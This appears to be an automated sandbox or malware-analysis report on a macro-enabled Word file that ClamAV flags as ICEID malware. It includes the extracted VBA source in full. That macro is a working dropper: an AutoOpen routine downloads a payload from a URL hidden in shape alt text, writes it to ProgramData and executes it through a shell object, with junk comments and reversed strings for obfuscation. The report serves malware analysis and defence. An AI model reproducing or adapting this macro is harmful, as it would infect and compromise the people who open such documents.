MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set MmyUL = CreateObject(XybFS + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Cpczz = VBA.CreateObject(fJYHb + "" + nUmoS) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13547 bytes |
SHA-256: dd200bfdcd0a2c4bc99753bbd23e2c8bd7ea282eb020f57c3435e1986c70e9e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XPtmE"
Sub WMEez(MaEvy, Optional ByVal DNZXG As String = "c:\programdata\EuhHQ.txt", Optional ByVal nUmoS As String = "systemobject")
' Drawbridge checks deflector increases replenishment
' Alphabetically expulsion abundances spaceman insensible
' Sunburns pharmacy conventional restaurateurs reside happygolucky
' Fractionation
' Previously juxtaposing cruelly credited
' Abused wherefores worthiness
' Medications
' Mindedness taxable intuitionist shepherdess
' Disintegrated paradoxes tobacco daytime
' Dysfunctional multiplicative masonic
' Feverish
' Seriously
' Lodgement rule
' Perm complemented moral moodiness
' Towards lose
' Subtracts pounded exhaustive tormenting aquaria skittishness dustbin
' Memorise sure cuts robotics
' Encephalitis poverty screened
' Sailmaker heir mazes
' Troubleshooter
' Fixes opine twines
' Infused
' Subcontinent bookbinding personify welcome deviation egrets haphazard
Set Cpczz = VBA.CreateObject(fJYHb + "" + nUmoS)
' Gentrified general
' Alight citrons clings deforestation solace echinoderms
' Internalises banknote
' Rantings
' Disqualify radically
Set GXSnH = Cpczz.CreateTextFile(DNZXG)
' Superfluously blaze beehive horticulture marmosets
' Seminaries tribally
' Dwindled
' Tugging sublimity
' Hearties unseasonable autoimmune urologist laryngeal
GXSnH.WriteLine MaEvy
' Treacherously measured theologian
' Miserably tigris
' Psychedelic valencies dingdong hypercube
' Gotten kicks termites
' Uplifts
' Competition mbabane
GXSnH.Close
' Avowedly quayside sweepstake divided stiffener stench
' Predicating guarding
' Whorls diadem bespeaking
' Lazily plotting
' Retraction schoolmates oranges toilet notepad
' Lash
' Epicycles cringe exmembers
' Disco valuta fairness meows dulls
' Conjury deduced
' Unzipped unsuspecting
' Trailing diversified handguns
' Frightening aestheticsy secretes molestations
' Tau atmospherically eatery spats singable trapeze
' Avoirdupois firefighters dared sniffer parental clapped
' Touches legitimating
' Footless surrender reinstalling violets
' Feign purposive practicabilities
' Tanneries academicians whizkids
' Tactics
' Bur unties
' Stacked starlings unprotected diffuser
' Lending cough thunders dreaming
' Sweethearts abjectly shipyard
' Untold ugliness
' Tubers won selection gloated
' Goodwill leaden fulfilling collaboration
' Cryptology shamans cowriter accusation efficacious cumbersomely
' Mileposts crimp postcode
' Coopers semiconscious maintainable restless threshed codify
' Diminished crookedness bestiary
' Fretted stopping archdiocese humankind sedated rehabilitating overplayed
' Knowledge cheapening conjectural hernias
' Absurdities brawl
' Parametrise iniquities cowgirl fabrication reconstructed third mystic
' Liquids
' Interrogates zees stigmatising
' Timber gang posit circumvented
' Trenches chlamydia courts fixations
' Wedge braked eliminates bursars quotidian
End Sub
' Pyrotechnic commandeered
' Emerge jacked cleft conversationalist
' Lychee enactments profitably temperature
' Multilayer socioeconomic
' Junctions actress chef
Sub AutoOpen()
' Emersion calculates blazer devil
' Holistic
' Garble manifests
' Cleanness rasping moment
' Fibbing primitives cursing
' Hostelries chestnut
' District malignant stark unsightly
' Stringencies vote awoken dusters scarlets
' Festooned itinerants
' Shrewder emetic vendetta
' Courage premeditation misidentification
' Concludes roasts competition maternal unreached
' Arrogant husked crusades erasable slaps
' Gust grossed carbonic homecoming devoted
' Segregated consisted cheated
' Goodly exquisiteness thumped semen
' Beseech warhead tactfully teeth
' Elucidation anodised mulch patrilineal
' Apologetically slav dexterous placated
' Indefeasible ebony shawl
' Cutlasses comparison
' Vortexes cellular blouses eclairs
' Eon
' Brink surprisingly juxtaposes unappreciative laggard fussy
' Tissue minefields
' Castings entail rosaries trailing underwriters
' Clearance iconoclasm
' Destruction buy
' Attains assents
' Interesting eroding bayonet leap
' Fiver hypotension
' Retaining
' Brunette
Dim joajm As New IfIHh
' Resigned reposes characteristic falseness
' Gyms trumps claret whore fills
' Aggressive candelabra fussed
' Reaffirmation departed dumbbell
' Mileage bung
dwiup = ""
' Poor schoolteacher surreptitiously
' Residual ravers comfy
' Fingernail
' Frontal musicians stentor pickpocketing
' Pavilion sifting hat effluents artiste citizen
' Everlastingly
' Gingerly fluent
' Recessed offshoot insistently emerges soviet
' Puffed loathsome
' Animator fair orangutan
MaEvy = joajm.HqGfq(bkQTc)
' Grocery tiresomely
' Upheavals wining cedar mandrill
' Characterful amoeba caseload normandy disabling accruals
' Hypothesised pertly roved
' Illogic espoused centrists
WMEez aHBvM(MaEvy)
' Fractal institutes mauler noddy
' Cranny glasshouses rackets hooky
' Very
' Groupies legitimise clubhouse fibroblasts
' Replace hurdles enters niggles
' Duties
' Unworkable adipose
' Flimsiest explosiveness
' Unimaginable farflung
' Torturer ararat feed
' Trailers liberality idioms uncured
MILHj fsxAY(0) + "vr32 c:\programdata\EuhHQ.txt", "wscript"
End Sub
Function Tilhj(ANjvk, WkDbR)
' Dispersions mistaking
' Sheered exchanger amateurishness rustle
' Tragedians confederation
' Fewer cellulose sheepdog embarrassment
' Peacetime boxes farrago leakiness pandering
' Enclosures
' Mysticism chinked retest
' Autumnal laddie keypads
Tilhj = Split(ANjvk, WkDbR)
End Function
Attribute VB_Name = "igdAD"
' Freed necklace sailors ties sugarplums chronometer
' Extensive druid nourishing
' Astrally repelling windward equity
' Roughest stolen
' Terns breadfruit hardearned lavishly unsatisfactoriness welldesigned finery
' Defaced outsize hone
Function aHBvM(CfWtU)
' Thinning barbecue
' Deliberated lily wordplay deify flecked
' Authoress
' Musically idealists wends shrouds comatose
aHBvM = StrConv(CfWtU, vbUnicode)
' Olden fulminate
' Darned
' Broils seated assail beast
' Handsome auctioneer discomfiture subsumes detains
' Examinable jacuzzi rowboats tempers
End Function
' Lugubrious internationals featuring
' Teatime dentist layered pithier
' Enquire
' Caution shelter
' Sterilisations foreshore uninspiring costlier wrists
Function BBwPl()
' Incoherent washy girder
' Jalopy hilarious informing complimented
' Loathing chemiluminescent
' Floured diode saucier curtseys
' Sedates protects feted pillowed
' Belonging satirical stayers
' Towing phrenologists paratroop bone
' Turtle pith mowed brocade negate
' Grownups thirsts gabbled
' Safe colonels
' Dimes
With ActiveDocument.shapes(1)
BBwPl = .AlternativeText
End With
End Function
' Swish
' Aversions moleskin
' Benders converting creeper sustains crampons wheedled innumerate
' Owe overtly roughing pornographer
' Driveways porosity unadaptive
' Draftees undefinable
Function fsxAY(BmqtO)
' Sickest regretted
' Boa lymphoid
' Shortly incest extorted overpower soothsaying
' Integral treasure shaggiest
' Pushy choral interfere hawker
' Pedal awnings
' Emollient rely
' Fairs eardrop
' Hygienists hardly draughtsman
' Basks
' Supervisions distillers
OSLWv = Tilhj(BBwPl(), "~~~")
Xtugd = OSLWv(BmqtO)
fsxAY = Xtugd
End Function
Attribute VB_Name = "IfIHh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function gSzet(IWKhZ, YoHxv, WcDwS)
' Instantiates rocksolid charon handshake
' Mosquito flouting pairings hurricane
' Clank acacia reaction complementarity scrabbling redistributing
' Elementally discriminants
gSzet = Mid(IWKhZ, YoHxv, WcDwS)
End Function
Public Function ObyTP(qOWrL, MudJU)
' Modern prehistory booth fedup inveigh
' Constant parachutists
' Flourished
' Behaves storytellers
' Feeling keystone
' Emphysema refresh
' Forking body trundled straddled
' Ahead improvises
' Risk
' Pricing anatomically trade girdles mounds
' Lazing overrun welcome
' Aerodynamically rue
' Utilitarian generalise impacting janitor surmise structurally
' Autobiographically
' Matriculating sinkable
' Flocked humps
uhSwW = Trim(qOWrL)
For reFCQ = MudJU To Len(uhSwW)
WkQgD = gSzet(uhSwW, reFCQ, MudJU) & WkQgD
Next reFCQ
ObyTP = WkQgD
End Function
' Milker protectionism relaunched
' Democrats enthusiasts
' Chandeliers boomerang chainsmoking
' Chanted administering
' Congruity aftereffect pictures
' Mouthwatering blockheads untypical pursued
Function HqGfq(mdSPv)
' Prudish receptionist soft precognitions burying
' Reify believers deposed
' Sacrum treetop
' Monogamous cartographic leopardskin floorboard dagga
Dim ZUmZY As Object
' Smallholders reputed
' New conjuror
' Batten ski skimmer importunity
' Temporality meeter haggle
' Lists
' Cabal contretemps criminalise
' Drawings gradings stagey lateral ineffectual
' Tranquillise facial counterfeiters soiling ebb indignities
' Spasm
' Sickens masts collaborationist
' Carpets cyclic visitation endotoxin
' Daylight
' Capped aloofness loosed
Set ZUmZY = CreateObject(ObyTP(mdSPv, 1) + "." + ObyTP(mdSPv, 1) + "Request.5.1")
' Passant inductions
' Spruce household
' Digging scentless remounted lobster
' Aneurysm childless gripped
' Resonates symptoms encoders prowling
' Foreseeable humiliations pondering
' Woodworking
' Arrowhead medusa muscled uneventfully redeposited
' Debaters infusing pyracantha spoil vague lungfish
' Kettleful basely pretence suffered discarded musingly
' Fee ineluctable diverging
' Mineral deducts disturbs
' Castling clouts edges
' Pectoral
' Coves mimed
' Flesher consist
' Wallet belches outspokenly kettle takers
' Reasons outclassed hailstones nightwear instinctual
' Legumes
' Abstractly bonanza diffusional
' Chloroform
' Fiddlesticks bestseller stables
' Outbid pledging flipping schismatic malignancies
' Outruns maximum
Bljwg = fsxAY(1)
' Pornographic todies oxymoron iron
' Numbers heralds unimpressed
' Zippy axillary nightmare
' Duomo scowls
' Savouring
' Conservatory fattier consul menacing
ZUmZY.Open "GET", ObyTP(Bljwg, 1), False
' Financed harshen managerial filthily broiler
' Repertoire inquisitors objectionably
' Revisionists flesh peru bookmaker
' Maidenly inverts spines realists
' Tamely multichannel drooling stoppage
ZUmZY.Send
' Pulpy signed translate character dingier
' Murderers admires draftier
' Exorcisms consortia
' Calcified splashdown satirists acreage denigrations
' Impressionism aftereffects stew
' Caked quinces finder yards pander barbs bibles
HqGfq = ZUmZY.responsebody
End Function
Attribute VB_Name = "TOFkI"
Public Const bkQTc As String = "ptthniw"
Public Const fJYHb As String = "scripting.file"
Sub MILHj(AdAKA, XybFS)
' Dehorn conformist minors recordbreaking irresolution conjure
' Ephemeris gnomic persists
' Sought muddle dutifully quickening
' Stiffen sewings viewings scoreless prepositional
' Certify untiring
' Tournaments rearrange aseptic
' Dermis disinterested
Set MmyUL = CreateObject(XybFS + "." + "shell")
' Vituperation safari
' Nonsensical costing anagrammatically skateboards
' Whirlwinds stinks blackly foothills impugned
' Combs imprecise vicarage
' Seconder acts
' Instigates eventually
' Intimacy spendthrift aestheticism inhomogeneous
' Corruption inaccurately flotations ledge
' Thrones torpedo best war mounds tactic
' Mealy paddling contributors tenderly sunbeams
' Fungoid incorrigible uncelebrated
' Unchecked indiscriminately blending summonings smile heads fallacy
' Handiest openness subgroups
' Yodelled pox middays cams wanes
' Hummock home doubtless kittiwakes
' Offered costefficient
' Wheeze killers stones
' Divination
' Refusal squirts adornment nougat
' Gullibility tooted
' Willpower excitedly spunky insolvent mischievous liberalising
' Cadge
' Actualities occurrences
' Fluids genealogy dryer acidic badminton
' Hammering amiability sheaves
' Halters smitten branched
' Mermen riper releasing neurone inherent
' Unflinchingly
' Jellied circumventable scholastic boatswain
' Scrappy bungling ownerships
' Knickers scrambling disgraceful
' Collided kidney retrieve pathetically
' Scalped
' Luxor gun fails trimmer paining
' Blacksmith serology
' Dreamlike regrets
' Ideological collate vaccinated
' Mortises rutted populace flicked
' Eavesdroppers
' Toxicity sick
' Transliteration
' Reservations oceans homewards counterpoise
' Laager unfamiliar
' Peeler unobtrusive hoodlums academies factory
' Omnidirectional brassy
' Creakier enduring
' Snapping survivals snowcapped outweighed
' Soberly coauthored
' Pianistic pizazz eyewitnesses gradient inroad him
' Esteem
Call MmyUL.exec(AdAKA)
' Spindrier disclose redden mouldings impelled tattooed
' Unsmilingly cravings swab anechoic innermost revitalise
' Scrutinising veered traces maizes
' Footfalls books humped roach terminating
' Minting westernmost fetishism
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: dee7f08ca36db4890a4d0b0bdb8390846a6ec0896f7a2bb961b3264f9c92ffb1 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.